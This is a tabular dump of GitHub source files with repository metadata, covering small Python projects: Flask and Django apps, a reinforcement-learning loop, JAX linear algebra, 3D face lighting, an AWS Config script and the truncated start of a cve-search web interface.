blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2c67af0e6a0e47698557d1c16075616c11e7da42 | 1ec59e88299c7af9df3854188736b706e89e01fa | /app/forms/public/profile_forms.py | 1f3f68864842f4660895d45a56b96a51956c26cd | [] | no_license | Chenger1/NutCompany_FlaskApp | 7484b04721766b42f9cc909d11c3e942bf3b3371 | c51129e04f2c9e35263d9e28810b4c2862932ef6 | refs/heads/master | 2023-08-06T09:08:27.532820 | 2021-09-23T19:52:25 | 2021-09-23T19:52:25 | 405,457,276 | 0 | 0 | null | 2021-09-12T10:55:47 | 2021-09-11T18:44:35 | HTML | UTF-8 | Python | false | false | 1,241 | py | from flask_wtf import FlaskForm
from wtforms import StringField, SelectField
from wtforms.validators import Email, Optional
from ..custom_field import CustomFileField
from app._db.choices import CountryChoice
class ClientPersonalInfoForm(FlaskForm):
fio = StringField('ФИО', validators=[Optional()])
email = StringField('Email', validators=[Optional(), Email()])
phone = StringField('Телефон', validators=[Optional()])
company = StringField('Компания', validators=[Optional()])
photo = CustomFileField('Фото', validators=[Optional()])
class ClientProfileAddressForm(FlaskForm):
country = SelectField('Страна', choices=CountryChoice.choices(), coerce=CountryChoice.coerce)
city = StringField('Город', validators=[Optional()])
address = StringField('Адрес', validators=[Optional()])
country_ur = SelectField('Страна', choices=CountryChoice.choices(), coerce=CountryChoice.coerce)
city_ur = StringField('Город', validators=[Optional()])
address_ur = StringField('Адрес', validators=[Optional()])
index = StringField('Индекс', validators=[Optional()])
credentials = StringField('Реквизиты', validators=[Optional()])
| [
"exs2199@gmail.com"
] | exs2199@gmail.com |
816e04e5d69c642ba2a24942f2af7ce25030a1a5 | 8c9402d753e36d39e0bef431c503cf3557b7e777 | /Sarsa_lambda_learning/main.py | e198580483ff22b2a9cc4c9141037276d21998a9 | [] | no_license | HuichuanLI/play_with_deep_reinforcement_learning | 9477e925f6ade81f885fb3f3b526485f49423611 | df2368868ae9489aff1be4ef0c6de057f094ef56 | refs/heads/main | 2023-07-08T04:52:38.167831 | 2021-08-21T14:05:36 | 2021-08-21T14:05:36 | 395,042,978 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,418 | py | # -*- coding:utf-8 -*-
# @Time : 2021/8/17 10:59 下午
# @Author : huichuan LI
# @File : main.py
# @Software: PyCharm
from maze import Maze
from Sara_Lambda import SarsaLambdaTable
def update():
for episode in range(100):
# initial observation
observation = env.reset()
# RL choose action based on observation
action = RL.choose_action(str(observation))
while True:
# fresh env
env.render()
# RL take action and get next observation and reward
# 和Q_learning 一样
observation_, reward, done = env.step(action)
# RL choose action based on next observation
# 直接通过状态选择下一步
action_ = RL.choose_action(str(observation_))
# RL learn from this transition (s, a, r, s, a) ==> Sarsa
# 直接更新action_对应的哪一步
RL.learn(str(observation), action, reward, str(observation_), action_)
# swap observation and action
observation = observation_
action = action_
# break while loop when end of this episode
if done:
break
# end of game
print('game over')
env.destroy()
if __name__ == "__main__":
env = Maze()
RL = SarsaLambdaTable(actions=list(range(env.n_actions)))
env.after(100, update)
env.mainloop()
| [
"lhc14124908@163.com"
] | lhc14124908@163.com |
b29c5e65d26f5c8c0c9f722d200de823dcf5af31 | a478489da108ec850795ac24f798a0ac75bb4709 | /Standard_deviation-master/graphs/class1.py | d9180f882b2dbfe906f689b678c6b6f76b08ae4f | [
"MIT"
] | permissive | LiamBrower/Class-105 | 9ff0f54f98b3bc1a2e0b659cc67995a0b7b1c604 | 11b2aeaf8ad5836bd2da113261bbfb7abd52d441 | refs/heads/main | 2023-08-16T07:13:37.831836 | 2021-10-12T23:53:30 | 2021-10-12T23:53:30 | 416,531,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | import csv
with open(r'C:\Users\docto\Dropbox\WhiteHatJr\Class-105\Standard_deviation-master\graphs\class1.csv', newline='') as f:
reader = csv.reader(f)
file_data = list(reader)
#To remove headers from CSV
file_data.pop(0)
total_marks = 0
total_entries = len(file_data)
for marks in file_data:
total_marks += float(marks[1])
mean = total_marks / total_entries
print("Mean (Average) is -> "+str(mean))
import pandas as pd
import plotly.express as px
df = pd.read_csv("class1.csv")
fig = px.scatter(df, x="Student Number",
y="Marks"
)
fig.update_layout(shapes=[
dict(
type= 'line',
y0= mean, y1= mean,
x0= 0, x1= total_entries
)
])
fig.update_yaxes(rangemode="tozero")
fig.show()
| [
"noreply@github.com"
] | noreply@github.com |
80061a213c1bde5aef15c9b944e4fddf228b8218 | c95691559b7e94ccbd30d0295a852816bfd42f8a | /day25/day25.py | a48bdc73c07790270577bbe72ce4072fae2428da | [] | no_license | nsmryan/aoc2020 | 2fe515ca5f1db8711da00c9c921111d120d23b9f | a7810af1d2a0eff95d33da8d1378ba3b3a20b218 | refs/heads/master | 2023-02-03T05:32:08.817045 | 2020-12-25T14:54:21 | 2020-12-25T14:54:21 | 317,392,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | key1 = 8184785
key2 = 5293040
#key1 = 17807724
#key2 = 5764801
def step(value, subject):
return (value * subject) % 20201227
def find_loop(key):
value = 1
loop_times = 0
while value != key:
value = step(value, 7)
loop_times += 1
return loop_times
loop1 = find_loop(key1)
print("loop size " + str(loop1))
loop2 = find_loop(key2)
print("loop size " + str(loop2))
result = 1
for _ in range(0, loop1):
result = step(result, key2)
print(result)
result = 1
for _ in range(0, loop2):
result = step(result, key1)
print(result)
| [
"nsmryan@gmail.com"
] | nsmryan@gmail.com |
bc03d8274188df69eac85d025d78dbfa59a16efd | 42321745dbc33fcf01717534f5bf7581f2dc9b3a | /lab/jax/linear_algebra.py | 618778d388a9415d7318fdcb5ef3dd6f36ac76e4 | [
"MIT"
] | permissive | talayCh/lab | 0a34b99fd60bc65fdfd1ead602d94dfb6b96f846 | 4ce49b68782a1ef8390b14ee61f57eeaa13070cf | refs/heads/master | 2023-08-25T04:42:06.904800 | 2021-11-01T18:22:00 | 2021-11-01T18:22:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,756 | py | import logging
from typing import Union, Optional
import jax.numpy as jnp
import jax.scipy.linalg as jsla
from . import dispatch, B, Numeric
from .custom import jax_register
from ..custom import (
toeplitz_solve,
i_toeplitz_solve,
s_toeplitz_solve,
i_s_toeplitz_solve,
expm,
i_expm,
s_expm,
i_s_expm,
logm,
i_logm,
s_logm,
i_s_logm,
)
from ..linear_algebra import _default_perm
from ..types import Int
from ..util import batch_computation
__all__ = []
log = logging.getLogger(__name__)
@dispatch
def matmul(a: Numeric, b: Numeric, tr_a: bool = False, tr_b: bool = False):
a = transpose(a) if tr_a else a
b = transpose(b) if tr_b else b
return jnp.matmul(a, b)
@dispatch
def transpose(a: Numeric, perm: Optional[Union[tuple, list]] = None):
# Correctly handle special cases.
rank_a = B.rank(a)
if rank_a == 0:
return a
elif rank_a == 1 and perm is None:
return a[None, :]
if perm is None:
perm = _default_perm(a)
return jnp.transpose(a, axes=perm)
@dispatch
def trace(a: Numeric, axis1: Int = -2, axis2: Int = -1):
return jnp.trace(a, axis1=axis1, axis2=axis2)
@dispatch
def svd(a: Numeric, compute_uv: bool = True):
res = jnp.linalg.svd(a, full_matrices=False, compute_uv=compute_uv)
return (res[0], res[1], jnp.conj(transpose(res[2]))) if compute_uv else res
@dispatch
def eig(a: Numeric, compute_eigvecs: bool = True):
vals, vecs = jnp.linalg.eig(a)
return (vals, vecs) if compute_eigvecs else vals
@dispatch
def solve(a: Numeric, b: Numeric):
return jnp.linalg.solve(a, b)
@dispatch
def inv(a: Numeric):
return jnp.linalg.inv(a)
@dispatch
def det(a: Numeric):
return jnp.linalg.det(a)
@dispatch
def logdet(a: Numeric):
return jnp.linalg.slogdet(a)[1]
_expm = jax_register(expm, i_expm, s_expm, i_s_expm)
@dispatch
def expm(a: Numeric):
return _expm(a)
_logm = jax_register(logm, i_logm, s_logm, i_s_logm)
@dispatch
def logm(a: Numeric):
return _logm(a)
@dispatch
def _cholesky(a: Numeric):
return jnp.linalg.cholesky(a)
@dispatch
def cholesky_solve(a: Numeric, b: Numeric):
return triangular_solve(transpose(a), triangular_solve(a, b), lower_a=False)
@dispatch
def triangular_solve(a: Numeric, b: Numeric, lower_a: bool = True):
def _triangular_solve(a_, b_):
return jsla.solve_triangular(
a_, b_, trans="N", lower=lower_a, check_finite=False
)
return batch_computation(_triangular_solve, (a, b), (2, 2))
_toeplitz_solve = jax_register(
toeplitz_solve, i_toeplitz_solve, s_toeplitz_solve, i_s_toeplitz_solve
)
@dispatch
def toeplitz_solve(a: Numeric, b: Numeric, c: Numeric):
return _toeplitz_solve(a, b, c)
| [
"wessel.p.bruinsma@gmail.com"
] | wessel.p.bruinsma@gmail.com |
5be75593b7002ffbd31b4897bca03ea2ca701912 | cb938bb6201fb7ec3611623b54682a2252a0fc32 | /stud_comms/urls.py | 179f878fc5543e3e915ec1f32679e4628bab1528 | [] | no_license | JonoCX/2015-placement | 35e6ca11dac3841fcf785b4a787a5aadf403e5af | 385d70911cbc70cd9e030665caae44aa4504a685 | refs/heads/master | 2021-01-10T16:39:53.242741 | 2015-11-09T15:01:27 | 2015-11-09T15:01:27 | 45,845,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
from core.views import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'stud_comms.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', views.login, name='login'),
url(r'^admin/', include(admin.site.urls)),
url(r'^comms-system/', include('core.urls')),
url(r'^accounts/login/', views.login),
)
# Precaution; if debug is left on
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_URL) | [
"j.carlton@newcastle.ac.uk"
] | j.carlton@newcastle.ac.uk |
6d1251f96e95ba1a11e3cc90efb4ac438f43f3c2 | 2fc85575c373c9cd404b7a824e751ea984cbd1b9 | /ingredients/migrations/0001_initial.py | 547306c5c3d609a677c616c9fadc6cff85181ea3 | [] | no_license | ildecarz/bigbox | 3fd46e194346a10907fa33106e76df05b92bd7df | be45180fd979344b5412586cc92f13a331a2a8ad | refs/heads/main | 2023-05-05T21:23:53.353828 | 2021-05-28T13:55:52 | 2021-05-28T13:55:52 | 361,298,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py | # Generated by Django 2.2 on 2021-05-19 20:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Ingredient',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('notes', models.TextField()),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ingredients', to='ingredients.Category')),
],
),
]
| [
"ildemarocarrasco@gmail.com"
] | ildemarocarrasco@gmail.com |
91e562078bece0259cf7a8eeb1a9714d1804c552 | 5d8c3150f28ab998326e38f1da420eb4e8d946c6 | /app.py | 7fd829b831371a7fdfadebdd9b241882fd616fac | [] | no_license | hoon0624/garbage-classification-heroku | 6bb587704a38a18c9a65735c4eb84e3b1db116bc | e3f2d1535db9097cfb2f0d5ca42230ed3566e889 | refs/heads/master | 2023-05-13T08:33:40.825155 | 2020-04-14T17:38:17 | 2020-04-14T17:38:17 | 254,552,658 | 4 | 3 | null | 2023-05-01T21:37:48 | 2020-04-10T05:35:52 | Jupyter Notebook | UTF-8 | Python | false | false | 1,649 | py | from __future__ import division, print_function
# coding=utf-8
import sys
import os
import glob
import re
from pathlib import Path
# Import fast.ai Library
from fastai import *
from fastai.vision import *
# Flask utils
from flask import Flask, redirect, url_for, request, render_template
from werkzeug.utils import secure_filename
# Define a flask app
app = Flask(__name__)
path = Path("path")
classes = ['cardboard', 'glass', 'metal', 'paper', 'plastic', 'trash']
# depricated use DataBunch.load_empty
data2 = ImageDataBunch.single_from_classes(path, classes, ds_tfms=get_transforms(), size=224).normalize(imagenet_stats)
# learn = create_cnn(data2, models.resnet34)
# learn.load('model_9086')
path1 = Path("./path/models")
learn = load_learner(path1, 'export.pkl')
def model_predict(img_path):
"""
model_predict will return the preprocessed image
"""
img = open_image(img_path)
pred_class,pred_idx,outputs = learn.predict(img)
return pred_class
@app.route('/', methods=['GET'])
def index():
# Main page
return render_template('index.html')
@app.route('/predict', methods=['GET', 'POST'])
def upload():
if request.method == 'POST':
# Get the file from post request
f = request.files['file']
# Save the file to ./uploads
basepath = os.path.dirname(__file__)
file_path = os.path.join(
basepath, 'uploads', secure_filename(f.filename))
f.save(file_path)
# Make prediction
preds = model_predict(file_path)
preds = str(preds)
return preds
return None
if __name__ == '__main__':
app.run() | [
"donghoon.lee@mail.mcgill.ca"
] | donghoon.lee@mail.mcgill.ca |
cb1b09b13545f6e89fee158e5b5e37ee7d392d73 | 59366342805d7b7682a8c45fd5c11b910e791c21 | /L8包/package/pack1/py1.py | b0fd52ca063138c053548e40274a039e81ea139e | [] | no_license | wantwantwant/tutorial | dad006b5c9172b57c53f19d8229716f1dec5ccd1 | 8d400711ac48212e6992cfd187ee4bfb3642f637 | refs/heads/master | 2022-12-29T05:41:12.485718 | 2019-01-07T08:28:33 | 2019-01-07T08:28:33 | 171,679,026 | 2 | 0 | null | 2022-12-08T01:21:22 | 2019-02-20T13:33:42 | Python | UTF-8 | Python | false | false | 214 | py | def foo():
# 假设代表一些逻辑处理
print('foo')
def boo():
print('boo')
# 单脚本的时候,调用方法
foo()
boo()
print(__name__)
#
# if __name__ =='__main__':
# foo()
# boo()
| [
"778042395@qq.com"
] | 778042395@qq.com |
83416776a453799aedb29e38b0934f13e88a005a | c49e1cf78851aec6b3df5b4774d16020e919ed65 | /server/server/urls.py | d8c5d72f20c89ab8c18390b24afdb2f68626b3fe | [] | no_license | weeksling/product-tracking-portal | 5c3e41ae773f49440ff74adc4d3352133fe9485a | 4f10c573a18eeac19d6aed3bf3008d180ccb0a07 | refs/heads/master | 2021-01-06T20:35:14.141517 | 2017-08-13T23:30:39 | 2017-08-13T23:30:39 | 99,381,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 927 | py | """server URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('api.urls', namespace='api', app_name='api')),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
] | [
"weeksling@gmail.com"
] | weeksling@gmail.com |
35da58bdb8be02fba0f38d7f0bb56498199a2c1a | b090cb9bc30ac595675d8aa253fde95aef2ce5ea | /trunk/test/NightlyRun/test304.py | 73f9108132ad2bddc032b4278bf438f74d72234c | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | eyhl/issm | 5ae1500715c258d7988e2ef344c5c1fd15be55f7 | 1013e74c28ed663ebb8c9d398d9be0964d002667 | refs/heads/master | 2022-01-05T14:31:23.235538 | 2019-01-15T13:13:08 | 2019-01-15T13:13:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 837 | py | #Test Name: SquareSheetConstrainedStressSSA3d
from model import *
from socket import gethostname
from triangle import *
from setmask import *
from parameterize import *
from setflowequation import *
from solve import *
md=triangle(model(),'../Exp/Square.exp',180000.)
md=setmask(md,'','')
md=parameterize(md,'../Par/SquareSheetConstrained.py')
md.extrude(3,2.)
md=setflowequation(md,'SSA','all')
md.cluster=generic('name',gethostname(),'np',3)
md=solve(md,'Stressbalance')
#Fields and tolerances to track changes
field_names =['Vx','Vy','Vz','Vel','Pressure']
field_tolerances=[1e-13,1e-13,1e-13,1e-13,1e-13]
field_values=[\
md.results.StressbalanceSolution.Vx,\
md.results.StressbalanceSolution.Vy,\
md.results.StressbalanceSolution.Vz,\
md.results.StressbalanceSolution.Vel,\
md.results.StressbalanceSolution.Pressure,\
]
| [
"cummings.evan@gmail.com"
] | cummings.evan@gmail.com |
ca46b5a2afb0afc86c6767c17a30760e6a097ebe | af46ef78a8e680733efa0056e0388db529a523a3 | /list/is_instance.py | 4a52a23d6b36f6cba7246bfc4960f42ebeba6397 | [] | no_license | mjhea0/python-basic-examples | 90f3aa1cb1a1399a7fe7b1b7e07cced517433490 | aaf4a5458f3e016703b6677033ea17b9cc901596 | refs/heads/master | 2021-01-15T18:31:28.455291 | 2013-09-21T03:59:23 | 2013-09-21T03:59:23 | 13,141,089 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | #coding:utf-8
numList = [2000, 2003, 2005, 2006]
stringList = ["Essential", "Python", "Code"]
mixedList = [1, 2, "three", 4]
subList = ["A", "B", ["C", 2006]]
listList = [numList, stringList, mixedList, subList]
for x in listList:
for y in x:
if isinstance(y, int):
print y + 1
if isinstance(y, basestring):
print "String:" + y
| [
"wang.bo@okcash.cn"
] | wang.bo@okcash.cn |
e095364f26d4002c10f2091881651d28c6288ec2 | d732fb0d57ec5430d7b15fd45074c555c268e32c | /misc/config_files/read_config_1.py | 7778e50073f61ca9d0f99726798d819291ac18a6 | [] | no_license | askobeldin/mypython3 | 601864997bbebdabb10809befd451490ffd37625 | 8edf58311a787f9a87330409d9734370958607f1 | refs/heads/master | 2020-04-12T08:01:16.893234 | 2018-02-01T18:23:23 | 2018-02-01T18:23:23 | 60,504,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | # -*- coding: utf-8 -*-
#
################################################################################
from configparser import ConfigParser, ExtendedInterpolation
import re
import myutils
parser = ConfigParser(interpolation=ExtendedInterpolation(), strict=True)
parser.SECTCRE = re.compile(r"\[ *(?P<header>[^]]+?) *\]")
with open('config1.cfg', encoding='utf-8') as f:
parser.read_file(f)
myutils.showconfig1(parser)
| [
"askobeldin@gmail.com"
] | askobeldin@gmail.com |
dffff54fdbcd023f7ce8038ad836b2214eb95f3d | 4b4147ca5ad3cf6bd0235263fe8ec279d4ac4cc9 | /face3d/face3d/mesh_numpy/light.py | becc5fbc757e9f4ebe9cf39a03c07522c24a1b13 | [
"MIT"
] | permissive | weepiess/PRnet-train | e7d9f2ac75a977d5b25bac6bd50aa6d840a666ec | 16631e71623a1fbb7acf09d183ab460d0467564b | refs/heads/master | 2022-09-02T06:17:02.633333 | 2020-05-20T17:07:02 | 2020-05-20T17:07:02 | 259,006,451 | 1 | 0 | MIT | 2020-05-09T10:44:35 | 2020-04-26T10:51:44 | Python | UTF-8 | Python | false | false | 7,717 | py | '''
Functions about lighting mesh(changing colors/texture of mesh).
1. add light to colors/texture (shade each vertex)
2. fit light according to colors/texture & image.
Preparation knowledge:
lighting: https://cs184.eecs.berkeley.edu/lecture/pipeline
spherical harmonics in human face: '3D Face Reconstruction from a Single Image Using a Single Reference Face Shape'
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
def get_normal(vertices, triangles):
''' calculate normal direction in each vertex
Args:
vertices: [nver, 3]
triangles: [ntri, 3]
Returns:
normal: [nver, 3]
'''
pt0 = vertices[triangles[:, 0], :] # [ntri, 3]
pt1 = vertices[triangles[:, 1], :] # [ntri, 3]
pt2 = vertices[triangles[:, 2], :] # [ntri, 3]
tri_normal = np.cross(pt0 - pt1, pt0 - pt2) # [ntri, 3]. normal of each triangle
normal = np.zeros_like(vertices) # [nver, 3]
for i in range(triangles.shape[0]):
normal[triangles[i, 0], :] = normal[triangles[i, 0], :] + tri_normal[i, :]
normal[triangles[i, 1], :] = normal[triangles[i, 1], :] + tri_normal[i, :]
normal[triangles[i, 2], :] = normal[triangles[i, 2], :] + tri_normal[i, :]
# normalize to unit length
mag = np.sum(normal**2, 1) # [nver]
zero_ind = (mag == 0)
mag[zero_ind] = 1;
normal[zero_ind, 0] = np.ones((np.sum(zero_ind)))
normal = normal/np.sqrt(mag[:,np.newaxis])
return normal
# TODO: test
def add_light_sh(vertices, triangles, colors, sh_coeff):
'''
In 3d face, usually assume:
1. The surface of face is Lambertian(reflect only the low frequencies of lighting)
2. Lighting can be an arbitrary combination of point sources
--> can be expressed in terms of spherical harmonics(omit the lighting coefficients)
I = albedo * (sh(n) x sh_coeff)
albedo: n x 1
sh_coeff: 9 x 1
Y(n) = (1, n_x, n_y, n_z, n_xn_y, n_xn_z, n_yn_z, n_x^2 - n_y^2, 3n_z^2 - 1)': n x 9
# Y(n) = (1, n_x, n_y, n_z)': n x 4
Args:
vertices: [nver, 3]
triangles: [ntri, 3]
colors: [nver, 3] albedo
sh_coeff: [9, 1] spherical harmonics coefficients
Returns:
lit_colors: [nver, 3]
'''
assert vertices.shape[0] == colors.shape[0]
nver = vertices.shape[0]
normal = get_normal(vertices, triangles) # [nver, 3]
sh = np.array((np.ones(nver), n[:,0], n[:,1], n[:,2], n[:,0]*n[:,1], n[:,0]*n[:,2], n[:,1]*n[:,2], n[:,0]**2 - n[:,1]**2, 3*(n[:,2]**2) - 1)) # [nver, 9]
ref = sh.dot(sh_coeff) #[nver, 1]
lit_colors = colors*ref
return lit_colors
def add_light(vertices, triangles, colors, light_positions = 0, light_intensities = 0):
''' Gouraud shading. add point lights.
In 3d face, usually assume:
1. The surface of face is Lambertian(reflect only the low frequencies of lighting)
2. Lighting can be an arbitrary combination of point sources
3. No specular (unless skin is oil, 23333)
Ref: https://cs184.eecs.berkeley.edu/lecture/pipeline
Args:
vertices: [nver, 3]
triangles: [ntri, 3]
light_positions: [nlight, 3]
light_intensities: [nlight, 3]
Returns:
lit_colors: [nver, 3]
'''
nver = vertices.shape[0]
normals = get_normal(vertices, triangles) # [nver, 3]
# ambient
# La = ka*Ia
# diffuse
# Ld = kd*(I/r^2)max(0, nxl)
direction_to_lights = vertices[np.newaxis, :, :] - light_positions[:, np.newaxis, :] # [nlight, nver, 3]
direction_to_lights_n = np.sqrt(np.sum(direction_to_lights**2, axis = 2)) # [nlight, nver]
direction_to_lights = direction_to_lights/direction_to_lights_n[:, :, np.newaxis]
normals_dot_lights = normals[np.newaxis, :, :]*direction_to_lights # [nlight, nver, 3]
normals_dot_lights = np.sum(normals_dot_lights, axis = 2) # [nlight, nver]
diffuse_output = colors[np.newaxis, :, :]*normals_dot_lights[:, :, np.newaxis]*light_intensities[:, np.newaxis, :]
diffuse_output = np.sum(diffuse_output, axis = 0) # [nver, 3]
# specular
# h = (v + l)/(|v + l|) bisector
# Ls = ks*(I/r^2)max(0, nxh)^p
# increasing p narrows the reflectionlob
lit_colors = diffuse_output # only diffuse part here.
lit_colors = np.minimum(np.maximum(lit_colors, 0), 1)
return lit_colors
## TODO. estimate light(sh coeff)
## -------------------------------- estimate. can not use now.
def fit_light(image, vertices, colors, triangles, vis_ind, lamb = 10, max_iter = 3):
[h, w, c] = image.shape
# surface normal
norm = get_normal(vertices, triangles)
nver = vertices.shape[1]
# vertices --> corresponding image pixel
pt2d = vertices[:2, :]
pt2d[0,:] = np.minimum(np.maximum(pt2d[0,:], 0), w - 1)
pt2d[1,:] = np.minimum(np.maximum(pt2d[1,:], 0), h - 1)
pt2d = np.round(pt2d).astype(np.int32) # 2 x nver
image_pixel = image[pt2d[1,:], pt2d[0,:], :] # nver x 3
image_pixel = image_pixel.T # 3 x nver
# vertices --> corresponding mean texture pixel with illumination
# Spherical Harmonic Basis
harmonic_dim = 9
nx = norm[0,:];
ny = norm[1,:];
nz = norm[2,:];
harmonic = np.zeros((nver, harmonic_dim))
pi = np.pi
harmonic[:,0] = np.sqrt(1/(4*pi)) * np.ones((nver,));
harmonic[:,1] = np.sqrt(3/(4*pi)) * nx;
harmonic[:,2] = np.sqrt(3/(4*pi)) * ny;
harmonic[:,3] = np.sqrt(3/(4*pi)) * nz;
harmonic[:,4] = 1/2. * np.sqrt(3/(4*pi)) * (2*nz**2 - nx**2 - ny**2);
harmonic[:,5] = 3 * np.sqrt(5/(12*pi)) * (ny*nz);
harmonic[:,6] = 3 * np.sqrt(5/(12*pi)) * (nx*nz);
harmonic[:,7] = 3 * np.sqrt(5/(12*pi)) * (nx*ny);
harmonic[:,8] = 3/2. * np.sqrt(5/(12*pi)) * (nx*nx - ny*ny);
'''
I' = sum(albedo * lj * hj) j = 0:9 (albedo = tex)
set A = albedo*h (n x 9)
alpha = lj (9 x 1)
Y = I (n x 1)
Y' = A.dot(alpha)
opt function:
||Y - A*alpha|| + lambda*(alpha'*alpha)
result:
A'*(Y - A*alpha) + lambda*alpha = 0
==>
(A'*A*alpha - lambda)*alpha = A'*Y
left: 9 x 9
right: 9 x 1
'''
n_vis_ind = len(vis_ind)
n = n_vis_ind*c
Y = np.zeros((n, 1))
A = np.zeros((n, 9))
light = np.zeros((3, 1))
for k in range(c):
Y[k*n_vis_ind:(k+1)*n_vis_ind, :] = image_pixel[k, vis_ind][:, np.newaxis]
A[k*n_vis_ind:(k+1)*n_vis_ind, :] = texture[k, vis_ind][:, np.newaxis] * harmonic[vis_ind, :]
Ac = texture[k, vis_ind][:, np.newaxis]
Yc = image_pixel[k, vis_ind][:, np.newaxis]
light[k] = (Ac.T.dot(Yc))/(Ac.T.dot(Ac))
for i in range(max_iter):
Yc = Y.copy()
for k in range(c):
Yc[k*n_vis_ind:(k+1)*n_vis_ind, :] /= light[k]
# update alpha
equation_left = np.dot(A.T, A) + lamb*np.eye(harmonic_dim); # why + ?
equation_right = np.dot(A.T, Yc)
alpha = np.dot(np.linalg.inv(equation_left), equation_right)
# update light
for k in range(c):
Ac = A[k*n_vis_ind:(k+1)*n_vis_ind, :].dot(alpha)
Yc = Y[k*n_vis_ind:(k+1)*n_vis_ind, :]
light[k] = (Ac.T.dot(Yc))/(Ac.T.dot(Ac))
appearance = np.zeros_like(texture)
for k in range(c):
tmp = np.dot(harmonic*texture[k, :][:, np.newaxis], alpha*light[k])
appearance[k,:] = tmp.T
appearance = np.minimum(np.maximum(appearance, 0), 1)
return appearance
| [
"1095215611@qq.com"
] | 1095215611@qq.com |
6b19f346e79e3bb234cd98628ac0189f74c1dc9c | 6c3bdcad87e2ddbc6d8e61419b62d91b898071ab | /sdk/python/config/listConfigRules.py | 51a7eddfa4e733f46e2266d99f1048c431a99d72 | [] | no_license | JaydeepUniverse/aws | c6b2a7f93668d7300223be46a418d436233ff9ad | 528043a78dc0a07bc8b0bb1193c7f440f8a5bd1a | refs/heads/master | 2023-02-22T00:41:32.376590 | 2021-01-16T10:17:22 | 2021-01-16T10:17:22 | 292,547,255 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | ## Do AWS CLI configuration - aws configure
import boto3
client = boto3.client('config')
rulesList = client.describe_config_rules()
for i in rulesList['ConfigRules']:
print(i['ConfigRuleName'])
| [
"noreply@github.com"
] | noreply@github.com |
3c7761a66a130162d48b33cc7bb6d62086a049f8 | 1b9dcc5051719fce3fdf6d64ef6b39adc10d5bb3 | /Tools/cve-search-master/web/minimal.py | 8ed4b0e2f7a93f31d4aeed408738049797a0376e | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] | permissive | abuvanth/watchdog | 20e0358a6892206fcc794478d2d24c95c838fa4e | 0a0fae253bf4321cdfb83052f56555a5ca77f7b9 | refs/heads/master | 2020-10-01T20:23:53.950551 | 2019-12-12T13:57:56 | 2019-12-12T13:57:56 | 227,618,188 | 2 | 0 | Apache-2.0 | 2019-12-12T13:51:25 | 2019-12-12T13:51:24 | null | UTF-8 | Python | false | false | 8,912 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Minimal web interface to cve-search to display the last entries
# and view a specific CVE.
#
# Software is free software released under the "Modified BSD license"
#
# Copyright (c) 2013-2016 Alexandre Dulaunoy - a@foo.be
# Copyright (c) 2014-2016 Pieter-Jan Moreels - pieterjan.moreels@gmail.com
# imports
import os
import re
import sys
import urllib
_runPath = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(_runPath, ".."))
from flask import render_template, request
import lib.DatabaseLayer as db
import lib.Toolkit as tk
from lib.Config import Configuration
from web.api import API, APIError
class Minimal(API):
#############
# Variables #
#############
defaultFilters={'timeSelect': 'all',
'startDate': '', 'endDate': '', 'timeTypeSelect': 'Modified',
'cvssSelect': 'all', 'cvss': '', 'rejectedSelect': 'hide'}
args = {'pageLength': Configuration.getPageLength(),
'listLogin': Configuration.listLoginRequired(),
'minimal': True}
def __init__(self):
